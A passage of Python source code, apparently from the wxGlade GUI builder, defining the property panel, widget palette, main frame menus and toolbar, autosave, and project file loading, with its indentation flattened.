# create a ScrolledWindow and a Panel; with only ScrolledWindow, scrolling on gtk 3 does not work
scrolled = wx.ScrolledWindow( self.notebook, name=name)
panel = wx.Panel(scrolled, name="%s properties"%name)
if wx.VERSION[0]<3:
panel.SetBackgroundColour(scrolled.GetBackgroundColour())
return panel
def end_page(self, panel, sizer, header, select=False):
sizer.AddSpacer(30)
panel.SetAutoLayout(1)
panel.SetSizer(sizer)
sizer.Layout()
sizer.Fit(panel)
scrolled = panel.GetParent()
self.notebook.AddPage(scrolled, _(header),select=select)
self._set_page_size(scrolled)
def _set_page_size(self, scrolled):
# set ScrolledWindow and Panel to available size; enable scrolling, if required
# gets available size for notebook pages
ws, hs = self.notebook.GetSize()
ws -= self._notebook_decoration_size[0]
hs -= self._notebook_decoration_size[1]
w_scrollbar = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X) # width of a scrollbar
panel = [w for w in scrolled.GetChildren() if isinstance(w, wx.Panel)][0]
szr = panel.GetSizer()
if not szr: return
wm, hm = szr.GetMinSize()
if hs<hm:
# best size is smaller than the available height -> enable scrolling
scrolled.SetScrollbars(1, 5, 1, int(math.ceil(hm/5.0)))
panel.SetSize( (ws-w_scrollbar, hm) )
else:
panel.SetSize( (ws, hs) )
def on_notebook_size(self, event):
# calculate available size for pages
if self._notebook_decoration_size:
for scrolled in self.notebook.GetChildren():
self._set_page_size(scrolled)
if event: event.Skip()
def on_panel_size(self, event):
# when the dummy panel receives a size event, we know that things are ready to calculate the notebook pages size
# calculate decoration size from the dummy panel that was added initially
if event.GetSize() != (0,0):
wp, hp = self.notebook.GetPage(0).GetSize() # page/panel size
wn, hn = self.notebook.GetSize() # notebook size
self._notebook_decoration_size = (wn-wp, hn-hp)
self.notebook.DeletePage(0)
else:
# Mac OS: initial event on creation
event.Skip()
# not used any more for the application; causes crashes on CentOS 7; still used when testing
class wxGladeArtProvider(wx.ArtProvider):
def CreateBitmap(self, artid, client, size):
if wx.Platform == '__WXGTK__' and artid == wx.ART_FOLDER:
return wx.Bitmap(os.path.join(config.icons_path, 'closed_folder.png'))
return wx.NullBitmap
class wxGladePalettePanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
common.palette = self # for building the buttons
self.SetBackgroundColour( compat.wx_SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE) )
# load the available code generators
all_widgets = common.init_codegen()
if not config.use_gui: return
self.all_togglebuttons = [] # used by reset_togglebuttons
# for keyboard navigation:
self._id_to_coordinate = {}
self._ids_by_row = []
self._section_to_row = {}
# build the palette for all_widgets
sizer = wx.FlexGridSizer(0, 2, 0, 0)
maxlen = max([len(all_widgets[sect]) for sect in all_widgets]) # the maximum number of buttons in a section
for row, section in enumerate(all_widgets):
self._section_to_row[section] = row
self._ids_by_row.append([])
if section:
label = wx.StaticText(self, -1, "%s:" % section.replace('&', '&&'))
sizer.Add( label, 1, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 2 )
bsizer = wx.BoxSizer()
for col, button in enumerate(all_widgets[section]):
self._ids_by_row[-1].append(button.Id)
self._id_to_coordinate[button.Id] = (row,col)
bsizer.Add(button, flag=wx.ALL, border=1)
if isinstance(button, wx.ToggleButton):
self.all_togglebuttons.append(button)
sizer.Add(bsizer)
self.SetSizer(sizer)
# on platforms other than Windows, we'll set the ToggleButton background colour to indicate the selection
if wx.Platform == "__WXMSW__":
self._highlight_colour = None
else:
self._highlight_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT)
self.Bind(wx.EVT_CHAR_HOOK, self.on_char)
def reset_togglebuttons(self, keep=None):
# un-toggle all buttons except keep
for button in self.all_togglebuttons:
if keep is not None and button is keep:
if self._highlight_colour:
button.SetBackgroundColour(self._highlight_colour)
continue
if self._highlight_colour and button.GetBackgroundColour()==self._highlight_colour:
button.SetBackgroundColour(wx.NullColour)
if button.GetValue(): button.SetValue(False)
def on_char(self, event):
key = (event.GetKeyCode(), event.GetModifiers()) # modifiers: 1,2,4 for Alt, Ctrl, Shift
if key[1]: return event.Skip()
focused = self.FindFocus()
if not focused or not focused.Id in self._id_to_coordinate:
return event.Skip()
row, col = self._id_to_coordinate[focused.Id]
new_row = new_col = None
if key[0]==wx.WXK_UP:
if row>0: new_row = row-1
elif key[0]==wx.WXK_DOWN:
if row < len(self._ids_by_row)-1: new_row = row+1
elif key[0]==wx.WXK_LEFT:
if col>0: new_col = col-1
elif key[0]==wx.WXK_RIGHT:
if col < len(self._ids_by_row[row])-1: new_col = col+1
elif key[0]==wx.WXK_HOME:
new_col = 0
elif key[0]==wx.WXK_END:
new_col = len(self._ids_by_row[row])-1
elif key[0]==wx.WXK_PAGEUP:
new_row = 0
elif key[0]==wx.WXK_PAGEDOWN:
new_row = len(self._ids_by_row)-1
elif (ord("A") <= key[0] <= ord("Z")) and chr(key[0]) in misc.palette_hotkeys:
section = misc.palette_hotkeys[chr(key[0])]
new_row = self._section_to_row[section]
new_col = 0
else:
return event.Skip()
if new_row is None and new_col is None:
# limits hit
wx.Bell()
else:
if new_col is None: new_col = min(col, len(self._ids_by_row[new_row])-1)
if new_row is None: new_row = row
focus = self.FindWindowById(self._ids_by_row[new_row][new_col])
if focus: focus.SetFocus()
import shell_frame
class ShellFrame(shell_frame.ShellFrame):
def on_btn_assign(self, event):
# insert a variable assignment
widget = misc.focused_widget
if not widget:
event.Skip()
return
path = widget.get_path()
command = 'widget = common.root.find_widget_from_path("%s")\r\n'%path
#self.shell.push(command) # or .write ?
self.shell.write(command)
class wxGladeFrame(wx.Frame):
"Main frame of wxGlade"
def __init__(self):
version = config.version
pos, size, layout = self.init_layout_settings()
wx.Frame.__init__(self, None, -1, "wxGlade v%s" % version, pos=pos, size=size,
style=wx.DEFAULT_FRAME_STYLE, name='MainFrame')
common.main = self
self._set_icon()
self.create_menu()
self.create_toolbar()
style = wx.SP_3D | wx.SP_LIVE_UPDATE
self.splitter1 = wx.SplitterWindow(self, style=style)
self.splitter2 = wx.SplitterWindow(self.splitter1, style=style)
self.palette = wxGladePalettePanel(self.splitter2)
# create the property and the tree frame
common.property_panel = self.property_panel = wxGladePropertyPanel(self.splitter2)
common.root = app = application.Application()
common.app_tree = self.tree = WidgetTree(self.splitter1, app)
self.splitter1.SplitVertically(self.splitter2, self.tree)
self.splitter2.SplitHorizontally(self.palette, self.property_panel)
self.switch_layout(layout, initial=True)
# last visited directory, used on GTK for wxFileDialog
self.cur_dir = config.preferences.open_save_path
# set a drop target for us...
self._droptarget = FileDropTarget(self)
self.SetDropTarget(self._droptarget)
self.create_statusbar() # create statusbar for display of messages
self.Show()
#misc.set_focused_widget(common.root)
self.Bind(wx.EVT_CLOSE, self.on_close)
# disable autosave checks during unittests
if config.testing: return
self.init_autosave()
self.check_autosaved()
self.Bind(wx.EVT_CHAR_HOOK, self.on_char_hook)
if config.debugging:
self.splitter1.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.on_sash)
self.splitter2.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.on_sash)
def on_sash(self, event):
# XXX not yet used, but it could be used to re-format the palette panel
layout = self.layout_settings["layout"]
if layout==0:
size = (self.splitter1.GetSashPosition(), self.splitter2.GetSashPosition())
elif layout==1:
size = (self.splitter2.GetSashPosition(), self.splitter1.GetSashPosition())
elif layout==2:
size = (self.GetClientSize()[0], self.splitter2.GetSashPosition())
def on_char_hook(self, event):
# bound to EVT_CHAR_HOOK
focus = parent = self.FindFocus()
grid = None # will be set if a grid or a grid's child is focused
window_type = None
while parent:
# go up and identify parent: Palette, Property or Tree
if isinstance(parent, wx.grid.Grid):
grid = parent
if parent is self.palette:
window_type = "palette"
elif parent is self.tree:
window_type = "tree"
elif parent is self.property_panel:
window_type = "properties"
if window_type: break
parent = parent.GetParent()
# forward to specific controls / properties? (on wx 2.8 installing EVT_CHAR_HOOK on controls does not work)
if window_type=="properties" and grid and grid.Name!="grid":
# forward event to grid property?
if misc.focused_widget.properties[grid.Name].on_char(event):
return
if window_type=="tree":
if common.app_tree.on_char(event):
return
# global handler
misc.handle_key_event(event, window_type)
def set_widget(self, widget):
# update redo/repeat tools and menus
if not common.history: return
redo_state = (common.history.can_undo, common.history.can_redo, common.history.can_repeat)
if self._previous_redo_state == redo_state:
return
self._menu_undo.Enable(common.history.can_undo)
self._menu_redo.Enable(common.history.can_redo)
self._menu_repeat.Enable(common.history.can_repeat)
if self._tool_redo:
self._tool_undo.Enable(common.history.can_undo)
self._tool_redo.Enable(common.history.can_redo)
self._tool_repeat.Enable(common.history.can_repeat)
self.toolbar.Realize()
self._previous_redo_state = redo_state
# menu and actions #################################################################################################
def create_menu(self):
self._previous_redo_state = None
menu_bar = wx.MenuBar()
compat.wx_ToolTip_SetDelay(1000)
compat.wx_ToolTip_SetAutoPop(30000)
append_menu_item = misc.append_menu_item
# File menu
file_menu = wx.Menu(style=wx.MENU_TEAROFF)
NEW = append_menu_item(file_menu, -1, _("&New\tCtrl+N"), wx.ART_NEW)
misc.bind_menu_item(self, NEW, self.new_app)
item = append_menu_item(file_menu, -1, _("New from &Template...\tShift+Ctrl+N"))
misc.bind_menu_item(self, item, self.new_app_from_template)
OPEN = append_menu_item(file_menu, -1, _("&Open...\tCtrl+O"), wx.ART_FILE_OPEN)
misc.bind_menu_item(self, OPEN, self.open_app)
SAVE = append_menu_item(file_menu, -1, _("&Save\tCtrl+S"), wx.ART_FILE_SAVE)
misc.bind_menu_item(self, SAVE, self.save_app)
SAVE_AS = append_menu_item(file_menu, -1, _("Save As..."), wx.ART_FILE_SAVE_AS)
misc.bind_menu_item(self, SAVE_AS, self.save_app_as)
item = append_menu_item(file_menu, -1, _("Save As Template..."))
misc.bind_menu_item(self, item, self.save_app_as_template)
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
GENERATE_CODE = append_menu_item(file_menu, -1, _("&Generate Code\tCtrl+G"), wx.ART_EXECUTABLE_FILE)
misc.bind_menu_item(self, GENERATE_CODE, lambda: common.root.generate_code())
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(file_menu, -1, _("&Import from XRC..."))
misc.bind_menu_item(self, item, self.import_xrc)
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
EXIT = append_menu_item(file_menu, -1, _('E&xit\tCtrl+Q'), wx.ART_QUIT)
misc.bind_menu_item(self, EXIT, self.Close)
menu_bar.Append(file_menu, _("&File"))
# Edit menu ====================================================================================================
edit_menu = wx.Menu(style=wx.MENU_TEAROFF)
# these menu items will be updated
self._menu_undo = item = append_menu_item(edit_menu, -1, _('Un-do\tCtrl+Z'),
helpString="Un-do the last property modification on another widget")
misc.bind_menu_item(self, item, lambda: common.history.undo(misc.focused_widget))
self._menu_redo = item = append_menu_item(edit_menu, -1, _('Re-do\tCtrl+Y'),
helpString="Re-do the last property modification on another widget")
misc.bind_menu_item(self, item, lambda: common.history.redo(misc.focused_widget))
self._menu_repeat = item = append_menu_item(edit_menu, -1, _('Repeat\tCtrl-R'),
helpString="Repeat the last property modifications on another widget (multiple modifications, if applicable)")
misc.bind_menu_item(self, item, lambda: common.history.repeat(misc.focused_widget))
edit_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(edit_menu, -1, _('Template Manager...'))
misc.bind_menu_item(self, item, self.manage_templates)
item = append_menu_item(edit_menu, wx.ID_PREFERENCES, _('Preferences...'), "prefs.png")
misc.bind_menu_item(self, item, self.edit_preferences)
menu_bar.Append(edit_menu, _("&Edit"))
# Windows menu: layout and focus ===============================================================================
view_menu = wx.Menu(style=wx.MENU_TEAROFF)
i = append_menu_item(view_menu, -1, _("Layout &1: Tree\tAlt-1"), "../layout1.png")
misc.bind_menu_item(self, i, self.switch_layout, 0)
i = append_menu_item(view_menu, -1, _("Layout &2: Properties\tAlt-2"), "../layout2.png")
misc.bind_menu_item(self, i, self.switch_layout, 1)
i = append_menu_item(view_menu, -1, _("Layout &3: Narrow\tAlt-3"), "../layout3.png")
misc.bind_menu_item(self, i, self.switch_layout, 2)
view_menu.AppendSeparator()
i = append_menu_item(view_menu, -1, _("Focus &Tree\tF2"))
misc.bind_menu_item(self, i, self.show_tree)
i = append_menu_item(view_menu, -1, _("Focus &Properties\tF3"))
misc.bind_menu_item(self, i, self.show_props_window )
i = append_menu_item(view_menu, -1, _("Focus Pa&lette\tF4"))
misc.bind_menu_item(self, i, self.show_palette )
# submenu focus sections >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
view_props_menu = wx.Menu()
# randomly select set of shortcuts to be displayed:
if int(math.ceil(time.time())) % 2:
shortcuts = ["F8", "F9", "F10", "F11", "F12"]
else:
shortcuts = ["Ctrl-M", "Ctrl-L", "Ctrl-W", "Ctrl-E", "Ctrl-D"]
for sc, section in zip(shortcuts, ("Common", "Layout", "Widget", "Events", "Code")):
i = append_menu_item(view_props_menu, -1, _("Focus &%s\t%s"%(section, sc)))
misc.bind_menu_item(self, i, self.show_props_window, section)
view_menu.AppendSubMenu(view_props_menu, _("Focus Properties &Section"))
view_menu.AppendSeparator() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
i = append_menu_item(view_menu, -1, _("Show/Hide &Design\tF6"))
misc.bind_menu_item(self, i, self.show_design_window)
self._m_pin_design_window = i = append_menu_item(view_menu, -1, _("&Pin Design\tCtrl-P"), kind=wx.ITEM_CHECK)
misc.bind_menu_item(self, i, self.pin_design_window)
view_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(view_menu, wx.ID_REFRESH, _("&Refresh Preview\tF5"), "refresh.png")
misc.bind_menu_item(self, item, self.preview)
menu_bar.Append(view_menu, _("&Windows"))
# Help menu ====================================================================================================
help_menu = wx.Menu(style=wx.MENU_TEAROFF)
MANUAL = append_menu_item(help_menu, -1, _('Manual\tF1'), wx.ART_HELP_BOOK)
misc.bind_menu_item(self, MANUAL, self.show_manual)
#item = append_menu_item(help_menu, -1, _('Tutorial'))
#misc.bind_menu_item(self, item, self.show_tutorial)
help_menu.AppendSeparator() # ----------------------------------------------------------------------------------
i = append_menu_item(help_menu, -1, _('Mailing list'))
misc.bind_menu_item(self, i, self.show_mailing_list)
i = append_menu_item(help_menu, -1, _('Bug tracker'))
misc.bind_menu_item(self, i, self.show_bug_tracker)
i = append_menu_item(help_menu, -1, _('Releases'))
misc.bind_menu_item(self, i, self.show_releases)
help_menu.AppendSeparator() # ----------------------------------------------------------------------------------
if config.debugging:
i = append_menu_item(help_menu, -1, 'Shell\tF7')
misc.bind_menu_item(self, i, self.create_shell_window)
help_menu.AppendSeparator()
item = append_menu_item(help_menu, wx.ID_ABOUT, _('About'), wx.ART_INFORMATION)
misc.bind_menu_item(self, item, self.show_about_box)
menu_bar.Append(help_menu, _('&Help'))
self.SetMenuBar(menu_bar)
# Mac tweaks...
if wx.Platform == "__WXMAC__":
if compat.IS_PHOENIX:
wx.PyApp.SetMacAboutMenuItemId(wx.ID_ABOUT)
wx.PyApp.SetMacPreferencesMenuItemId(wx.ID_PREFERENCES)
wx.PyApp.SetMacExitMenuItemId(wx.ID_EXIT)
wx.PyApp.SetMacHelpMenuTitleName(_('&Help'))
else:
wx.App_SetMacAboutMenuItemId(wx.ID_ABOUT)
wx.App_SetMacPreferencesMenuItemId(wx.ID_PREFERENCES)
wx.App_SetMacExitMenuItemId(wx.ID_EXIT)
wx.App_SetMacHelpMenuTitleName(_('&Help'))
# file history support
num_entries = config.preferences.number_history
self.file_history = wx.FileHistory(num_entries)
self.file_history.UseMenu(file_menu)
files = common.load_file_history()
files.reverse()
for path in files:
self.file_history.AddFileToHistory(path.strip())
self.Bind(wx.EVT_MENU_RANGE, self.open_from_history, id=wx.ID_FILE1, id2=wx.ID_FILE1+num_entries-1)
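# wx.FileHistory assigns its menu items the ids wx.ID_FILE1 .. wx.ID_FILE1 + n - 1,
# which is why the EVT_MENU_RANGE binding above covers exactly that id range.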
def _add_label_tool(self, tb, size, id, label, bmp, itemtype, msg, msg_long=None):
ADD = tb.AddLabelTool if compat.IS_CLASSIC else tb.AddTool  # pick the right toolbar API for classic vs. Phoenix
if isinstance(bmp, str) and not bmp.startswith("wxART_"):
bmp = wx.Bitmap( os.path.join(config.icons_path, bmp) )
else:
# a wx.ART_... constant
bmp = wx.ArtProvider.GetBitmap(bmp, wx.ART_TOOLBAR, size)
return ADD(-1, _(label), bmp, wx.NullBitmap, itemtype, _(msg), _(msg_long or msg))
def create_toolbar(self):
# new, open, save, generate, add, delete, re-do, Layout 1, 2, 3, pin, help
# insert slot/page?
# Layout: Alt + 1,2,3
self.toolbar = tb = wx.ToolBar(self, -1)
self.SetToolBar(tb)
size = (21,21)
add = functools.partial(self._add_label_tool, tb, size)
t = add( wx.ID_NEW, "New", wx.ART_NEW, wx.ITEM_NORMAL, "Start a new file (Ctrl+N)")
self.Bind(wx.EVT_TOOL, self.new_app, t)
t = add( wx.ID_OPEN, "Open", wx.ART_FILE_OPEN, wx.ITEM_NORMAL, "Open an existing file (Ctrl+O)")
self.Bind(wx.EVT_TOOL, self.open_app, t)
t = add( wx.ID_SAVE, "Save", wx.ART_FILE_SAVE, wx.ITEM_NORMAL, "Save file (Ctrl+S)")
self.Bind(wx.EVT_TOOL, self.save_app, t)
if config.debugging and hasattr(wx, "ART_PLUS"):
t = add( -1, "Add", wx.ART_PLUS, wx.ITEM_NORMAL, "Add widget (Ctrl+A)")
t.Enable(False)
# XXX switch between wx.ART_DELETE for filled slots and wx.ART_MINUS for empty slots
t = add( -1, "Remove", wx.ART_MINUS, wx.ITEM_NORMAL, "Add widget (Ctrl+A)")
t.Enable(False)
tb.AddSeparator()
self._tool_undo = t = add( wx.ID_UNDO, "Un-do", wx.ART_UNDO, wx.ITEM_NORMAL, "Un-do (Ctrl+Z)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.undo(misc.focused_widget), t)
self._tool_redo = t = add( wx.ID_REDO, "Re-do", wx.ART_REDO, wx.ITEM_NORMAL, "Re-do (Ctrl+Y)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.redo(misc.focused_widget), t)
self._tool_repeat = t = add( -1, "Repeat", wx.ART_REDO, wx.ITEM_NORMAL, "Repeat (Ctrl+R)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.repeat(misc.focused_widget), t)
tb.AddSeparator()
t = add(-1, "Generate Code", wx.ART_EXECUTABLE_FILE, wx.ITEM_NORMAL, "Generate Code (Ctrl+G)" )
self.Bind(wx.EVT_TOOL, lambda event: common.root.generate_code(), t)
tb.AddSeparator()
t1 = add(-1, "Layout 1", "layout1.png", wx.ITEM_RADIO, "Switch layout: Tree",
"Switch layout: Palette and Properties left, Tree right")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(0), t1)
t2 = add(-1, "Layout 2", "layout2.png", wx.ITEM_RADIO,"Switch layout: Properties",
"Switch layout: Palette and Tree top, Properties bottom")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(1), t2)
t3 = add(-1, "Layout 3", "layout3.png", wx.ITEM_RADIO, "Switch layout: narrow",
"Switch layout: Palette, Tree and Properties on top of each other")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(2), t3)
self._layout_tools = [t1,t2,t3]
tb.AddSeparator()
t = add(-1, "Pin Design Window", "pin_design.png", wx.ITEM_CHECK, "Pin Design Window",
"Pin Design Window to stay on top")
self.Bind(wx.EVT_TOOL, lambda event: self.pin_design_window(), t)
self._t_pin_design_window = t
tb.AddSeparator()
t = add(wx.ID_HELP, "Help", wx.ART_HELP_BOOK, wx.ITEM_NORMAL, "Show manual (F1)")
self.Bind(wx.EVT_TOOL, self.show_manual, t)
self.toolbar.Realize()
def init_autosave(self):
# ALB 2004-10-15, autosave support...
self.autosave_timer = None
if not config.preferences.autosave: return
self.autosave_timer = wx.Timer(self, -1)
self.Bind(wx.EVT_TIMER, self.on_autosave_timer, self.autosave_timer)
self.autosave_timer.Start( int(config.preferences.autosave_delay) * 1000 )
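# wx.Timer.Start() expects milliseconds, hence the conversion of autosave_delay (seconds) above.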
def on_autosave_timer(self, event):
res = common.autosave_current()
if res == 2:
self.user_message(_("Auto saving... done"))
elif not res:
self.autosave_timer.Stop()
config.preferences.autosave = False
logging.info(_('Disable autosave function permanently'))
wx.MessageBox(
_('The autosave function failed. It has been disabled\n'
'permanently due to this error. Use the preferences\n'
'dialog to re-enable this functionality.\n'
'The details have been written to the wxGlade log file\n\n'
'The log file is: %s' % config.log_file ),
_('Autosave Failed'), wx.OK | wx.CENTRE | wx.ICON_ERROR )
def check_autosaved(self):
if not common.check_autosaved(None): return
res = wx.MessageBox(
_('There seems to be auto saved data from last wxGlade session: do you want to restore it?'),
_('Auto save detected'), style=wx.ICON_QUESTION | wx.YES_NO)
if res == wx.YES:
filename = common.get_name_for_autosave()
if self._open_app(filename, add_to_history=False):
self.cur_dir = os.path.dirname(filename)
common.root.saved = False
common.root.filename = None
self.user_message(_('Auto save loaded'))
common.remove_autosaved()
def edit_preferences(self):
dialog = preferencesdialog.wxGladePreferences(config.preferences)
if dialog.ShowModal() == wx.ID_OK:
wx.MessageBox( _('Changes will take effect after wxGlade is restarted'),
_('Preferences saved'), wx.OK|wx.CENTRE|wx.ICON_INFORMATION )
dialog.set_preferences()
else:
dialog.canceled()
dialog.Destroy()
def _get_toplevel(self):
# return the toplevel for a preview or design window
if misc.focused_widget and not isinstance(misc.focused_widget, application.Application):
# a widget is selected, find the toplevel window for it
return misc.focused_widget.toplevel_parent
# find main toplevel window
return common.root._get_top_window()
def preview(self):
"""Generate preview of the current loaded project.
A preview can be triggered by keyboard shortcut or by pressing the preview button.
The preview can be triggered for all selected widgets.
This doesn't mean that the widget is opened for editing."""
toplevel = self._get_toplevel()
if toplevel is not None:
toplevel.preview(refresh=True)
def show_palette(self):
if self.IsIconized(): self.Iconize(False)
self.palette.SetFocus()
def show_tree(self):
if self.IsIconized(): self.Iconize(False)
common.app_tree.SetFocus()
def show_props_window(self, section=None):
# XXX implement: if a section is active already, then go to first property of the page
if not self.property_panel.notebook: return
if self.IsIconized(): self.Iconize(False)
self.property_panel.pagenames
if not section:
self.property_panel.notebook.SetFocus()
else:
if not section in self.property_panel.pagenames:
return
i = self.property_panel.pagenames.index(section)
if self.property_panel.notebook.GetSelection() != i:
self.property_panel.notebook.ChangeSelection(i)
else:
self.property_panel.notebook.SetFocus()
# try to set the focus if the widget has changed; this is not yet implemented for many property types
widget = self.property_panel.current_widget
if ( widget and (widget is not np.current_property.owner) and
section in widget.PROPERTIES ):
i_p = widget.PROPERTIES.index(section) + 1
if i_p<len(widget.PROPERTIES):
prop = widget.properties.get(widget.PROPERTIES[i_p])
if prop: prop.set_focus()
self.Raise()
def show_design_window(self):
toplevel = self._get_toplevel()
if not toplevel: return
if toplevel.widget:
focus = toplevel.widget.FindFocus()
focused = focus and focus.GetTopLevelParent() is toplevel.widget.GetTopLevelParent()
if toplevel.widget and toplevel.widget.IsShownOnScreen() and not focused:
# just raise it
if toplevel.widget.GetTopLevelParent().IsIconized():
toplevel.widget.GetTopLevelParent().Iconize(False)
toplevel.widget.GetTopLevelParent().Raise()
return
# open or close
common.app_tree.show_toplevel(None, editor=toplevel)
def pin_design_window(self):
common.pin_design_window = not common.pin_design_window
if common.pin_design_window != self._t_pin_design_window.IsToggled():
self._t_pin_design_window.Toggle()
self.toolbar.Realize()
self._m_pin_design_window.Check(common.pin_design_window)
toplevel = self._get_toplevel()
if not toplevel or not toplevel.widget: return
frame = toplevel.widget.GetTopLevelParent()
if not isinstance(frame, wx.Frame): return
style = frame.GetWindowStyle()
if common.pin_design_window:
frame.SetWindowStyle( style | wx.STAY_ON_TOP)
elif style & wx.STAY_ON_TOP:
frame.ToggleWindowStyle(wx.STAY_ON_TOP)
if wx.Platform=='__WXMSW__':
frame.Iconize(True)
frame.Iconize(False)
else:
toplevel.widget.Raise()
def create_shell_window(self):
common.shell = ShellFrame(None)
if misc.focused_widget: common.shell.txt_path.SetValue( misc.focused_widget.get_path() )
common.shell.Show()
# status bar for message display ###################################################################################
def create_statusbar(self):
self.CreateStatusBar(1)
# ALB 2004-10-15 statusbar timer: delete user message after some time
self.clear_sb_timer = wx.Timer(self, -1)
self.Bind(wx.EVT_TIMER, self.on_clear_sb_timer, self.clear_sb_timer)
def user_message(self, msg):
# display a message, but clear it after a few seconds again
sb = self.GetStatusBar()
if sb:
sb.SetStatusText(msg)
if msg:
self.clear_sb_timer.Start(5000, True)
def on_clear_sb_timer(self, event):
sb = self.GetStatusBar()
if sb: sb.SetStatusText("")
####################################################################################################################
def ask_save(self):
"""checks whether the current app has changed and needs to be saved:
if so, prompts the user;
returns False if the operation has been cancelled"""
if not common.root.saved:
ok = wx.MessageBox(_("Save changes to the current app?"),
_("Confirm"), wx.YES_NO|wx.CANCEL|wx.CENTRE|wx.ICON_QUESTION)
if ok == wx.YES:
self.save_app()
return ok != wx.CANCEL
return True
def new_app(self, event=None):
"creates a new wxGlade project"
if not self.ask_save(): return
common.root.clear()
common.root.new()
common.root.filename = None
self.user_message("")
misc.rebuild_tree(common.root)
common.root.saved = True
common.remove_autosaved()
if common.history: common.history.reset()
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
def new_app_from_template(self):
"creates a new wxGlade project from an existing template file"
if not self.ask_save(): return
infile = template.select_template()
if infile:
self._open_app(infile, add_to_history=False)
common.root.template_data = None
def open_app(self, event=None):
"""loads a wxGlade project from an xml file
NOTE: this is very slow and needs optimisation efforts
NOTE2: the note above should not be True anymore :) """
if not self.ask_save():
return
default_path = os.path.dirname(common.root.filename or "") or self.cur_dir
infile = wx.FileSelector(_("Open file"),
wildcard="wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt)|*.wgt|"
"XML files (*.xml)|*.xml|All files|*",
flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=default_path)
if not infile: return
self._open(infile)
def open_from_history(self, event):
if not self.ask_save():
return
pos = event.GetId() - wx.ID_FILE1
filename = self.file_history.GetHistoryFile(pos)
if not os.path.exists(filename):
wx.MessageBox( _("The file %s doesn't exist.") % filename,
_('Information'), style=wx.CENTER | wx.ICON_INFORMATION | wx.OK )
self.file_history.RemoveFileFromHistory(pos)
common.remove_autosaved(filename)
return
self._open(filename)
def _open(self, filename):
# called by open_app and open_from_history
if common.check_autosaved(filename):
res = wx.MessageBox( _('There seems to be auto saved data for this file: do you want to restore it?'),
_('Auto save detected'), style=wx.ICON_QUESTION | wx.YES_NO )
if res == wx.YES:
common.restore_from_autosaved(filename)
else:
common.remove_autosaved(filename)
else:
common.remove_autosaved(filename)
path = position = None
if filename == common.root.filename:
# if we are re-loading the file, store path and position
if misc.focused_widget:
path = misc.focused_widget.get_path()
if misc.focused_widget.widget is not None and not misc.focused_widget.IS_ROOT:
toplevel = misc.get_toplevel_parent(misc.focused_widget.widget)
if toplevel: position = toplevel.GetPosition()
self._open_app(filename)
self.cur_dir = os.path.dirname(filename)
if not path: return
editor = common.root.find_widget_from_path(path)
if not editor: return
misc.set_focused_widget(editor)
if editor is common.root: return
editor.toplevel_parent.create()
common.app_tree.ExpandAllChildren(editor.item)
if not position or not editor.widget: return
misc.get_toplevel_parent(editor.widget).SetPosition(position)
def _open_app(self, filename, use_progress_dialog=True, add_to_history=True):
"Load a new wxGlade project"
error_msg = None
infile = None
start = time.time()
common.root.clear()
common.root.init()
common.app_tree.DeleteChildren(common.root.item)
common.app_tree.auto_expand = False # disable auto-expansion of nodes
try:
try:
logging.info( _('Read wxGlade project from file "%s"'), filename )
input_file_version = None
if not isinstance(filename, list):
common.root.filename = filename
# decoding will be done automatically by the SAX XML library
if compat.PYTHON2:
infile = open(filename)
else:
infile = open(filename, "r", encoding="UTF8")
if hasattr(infile, "seek"):
# try to read file version number from the first few lines
import re
version_re = re.compile(r"<!-- generated by wxGlade (\d+)\.(\d+)\.(\d+)(\S*)\s*")
for n in range(3):
match = version_re.match( infile.readline() )
if match:
major, minor, sub, extension = match.groups()
input_file_version = (int(major), int(minor), int(sub), extension)
break
infile.seek(0)
else:
common.root.filename = None
if use_progress_dialog and config.preferences.show_progress:
p = ProgressXmlWidgetBuilder(filename, input_file_version, input_file=infile)
else:
p = XmlWidgetBuilder(filename, input_file_version)
if infile is not None:
p.parse(infile)
else:
p.parse_string(filename)
filename = None
except (EnvironmentError, SAXParseException, XmlParsingError) as msg:
if config.debugging: raise
if infile is not None:
error_msg = _("Error loading file %s:\n%s") % (misc.wxstr(filename), misc.wxstr(msg))
else:
error_msg = _("Error loading from a file-like object:\n%s") % misc.wxstr(msg)
except Exception as inst:
if config.debugging: raise
if filename and not isinstance(filename, list):
fn = os.path.basename(filename).encode('ascii','replace')
msg = _('loading file "%s"') % fn
else:
msg = _('loading from a file-like object')
bugdialog.Show(msg, inst)
finally:
if infile and filename:
infile.close()
if error_msg:
common.root.clear()
common.root.new()
common.root.saved = True
if common.history: common.history.reset()
common.app_tree.auto_expand = True # re-enable auto-expansion of nodes
wx.MessageBox(error_msg, _('Error'), wx.OK | wx.CENTRE | wx.ICON_ERROR)
return False
misc.rebuild_tree(common.root, freeze=True)
common.app_tree.auto_expand = True # re-enable auto-expansion of nodes
common.app_tree.Expand(common.root.item)
if common.root.is_template:
logging.info(_("Template loaded"))
common.root.template_data = template.Template(filename)
common.root.filename = None
end = time.time()
logging.info(_('Loading time: %.5f'), end - start)
common.root.saved = True
if common.history: common.history.reset()
